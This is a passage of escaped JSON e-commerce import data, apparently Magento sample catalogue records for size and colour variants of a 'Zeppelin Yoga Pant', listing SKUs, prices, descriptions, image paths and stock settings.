Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"771\":{\"sku\":\"MP08-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-32-Red\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"772\":{\"sku\":\"MP08-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-33-Blue\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"773\":{\"sku\":\"MP08-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-33-Green\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"774\":{\"sku\":\"MP08-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-33-Red\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"775\":{\"sku\":\"MP08-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-34-Blue\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"776\":{\"sku\":\"MP08-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-34-Green\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"image\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp08-green_alt1.jpg,\\/m\\/p\\/mp08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"777\":{\"sku\":\"MP08-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-34-Red\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"778\":{\"sku\":\"MP08-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Zeppelin Yoga Pant-36-Blue\",\"description\":\"<p>Climb every mountain, or hold every pose, in the all-purpose Zepellin Yoga Pant. With its thin fleece interior and smooth layer-friendly surface, you\'ll get all the comfort and versatility you need.<\\/p>\\n<p>&bull; Smooth exterior for easy over-layering.<br \\/>&bull; Brushed fleece interior insulates and wicks. <br \\/>&bull; No-roll elastic waistband with inner drawstring.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"82\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zeppelin-yoga-pant-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"